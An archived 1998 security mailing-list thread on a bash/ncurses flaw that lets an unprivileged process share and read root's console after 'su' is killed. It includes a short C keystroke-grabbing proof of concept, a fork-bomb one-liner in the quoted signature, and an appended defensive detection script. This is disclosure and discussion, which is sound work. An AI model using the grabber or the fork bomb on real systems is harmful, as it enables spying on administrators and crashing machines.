Re: bash 2.01 / ncurses 4.1 console takeover "feature"

Savochkin Andrey Vladimirovich (saw@MSU.RU)
Tue, 10 Mar 1998 11:08:25 +0300

The described problem isn't a serious one.
If user 'lcam' wants to take control over root's terminal,
first of all he should force root to perform 'su lcam'.
So an attacker could take control over root's terminal
only in the case of an inexperienced superuser su'ing to unprivileged users.

Nevertheless, 'su' from the SimplePAMApps package developed by
Andrew Morgan <morgan@transmeta.com> is free of such a problem.
The program doesn't allow an unprivileged user to kill it.

Regards,
Andrey V. Savochkin

On Sat, Mar 07, 1998 at 09:06:21PM +0100, Michal Zalewski wrote:
> With bash 2.01 and ncurses 4.1, any program launched at an unprivileged
> uid (e.g. from an 'su' shell) may take over a privileged user's console
> (to grab keystrokes or something else). I found it's quite easy when
> I tried to kill 'su' directly from the unprivileged shell with signal 9:
>
> [root@genome /]# su lcam
> [lcam@genome /]$ killall -9 su
> Killed
> [root@genome /]#
>
> That was normal, but suddenly I saw again old prompt:
>
> [lcam@genome /]$
>
> From this point, two bash instances (the unprivileged one hasn't been
> killed with su!) were controlling my console at once... It looks
> just curious:
>
> [root@genome /]# id
> uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
> [lcam@genome /]$ id
> uid=502(lcam) gid=502(lcam) groups=502(lcam)
> [lcam@genome /]$
> [root@genome /]#
>
> Of course, it isn't so scary, because it has been done manually...
> But it can be easily used in a nasty program. A typical administrator
> believes that only the unprivileged account may be compromised when
> he's launching something on it, and usually he's right, but
> ncurses has a vulnerability which may be used to fool him. Unlike
> other lame su tricks, it's quite invisible (he may check on a
> second console - he's back in his REAL, root shell, but we can
> still control his console). I wrote a simple program (it may even be
> launched from ~/.bashrc; in the meantime, su should be killed), which
> is able to grab keystroke(s) from the console:
>
> -- test.c --
> // gcc test.c -lncurses -oanything
> #include <curses.h>
> #include <stdlib.h>   /* system() */
> int main(void) {
>     initscr();        /* attach ncurses to the (still shared) terminal */
>     noecho();         /* do not echo typed characters */
>     raw();            /* unbuffered input, no special handling of ^C etc. */
>     while (1) if (getch()=='x') system("touch /tmp/VOILA");
> }
> -- eof --
>
> It isn't perfect, actually it grabs only one of the first 'x's, and fails
> to grab the next ones (a lot of i/o errors when debugged ;-). But it
> CAN do that. For sure it's possible to keep control much longer, as
> shown above (bash example). Maybe it's even possible to do it
> after logout, I haven't checked it.
>
> _______________________________________________________________________
> Michał Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
> To iterate is human, to recurse divine [P. Deutsch]
> =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
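A defender-side check for the condition discussed in this thread (a root shell and an unprivileged shell both keeping the same controlling terminal after 'su' has been killed), added here as an example that is not part of either message. It assumes a procps-style ps that accepts `-eo tty=,uid=,pid=,comm=` and a POSIX awk; the sample process listing is constructed.

```shell
#!/bin/sh
# Flag terminals whose processes run under more than one uid.
# Input lines have the shape "TTY UID PID COMM", as printed by
#   ps -eo tty=,uid=,pid=,comm=

# Constructed sample: on tty1 the root bash and the lcam bash survive
# the killed su; tty2 and pts/0 are healthy single-uid terminals.
SAMPLE='tty1 0 1203 bash
tty1 502 1251 bash
tty2 0 1300 bash
? 0 1 init
pts/0 1000 2200 bash
pts/0 1000 2210 vim'

# shared_ttys: read ps-style lines on stdin, print "tty uid1,uid2,..."
# for every tty that hosts processes of two or more distinct uids.
shared_ttys() {
    awk '
        $1 == "?" { next }                 # process has no controlling tty
        !seen[$1, $2]++ {                  # first time this (tty, uid) pair
            uids[$1] = (uids[$1] == "") ? $2 : uids[$1] "," $2
            n[$1]++
        }
        END { for (t in n) if (n[t] > 1) print t, uids[t] }
    ' | sort
}

# audit_live: run the same check against the real process table.
audit_live() {
    ps -eo tty=,uid=,pid=,comm= | shared_ttys
}

# check_sample: exit status 1 when a shared terminal is found, so the
# check can drive a cron job or a monitoring alert.
check_sample() {
    out=$(printf '%s\n' "$SAMPLE" | shared_ttys)
    [ -z "$out" ] && return 0
    printf 'shared terminal: %s\n' "$out"
    return 1
}
```

On a normal system `audit_live` prints nothing; a line such as `tty1 0,502` means two uids share one terminal and the sessions on it deserve a look.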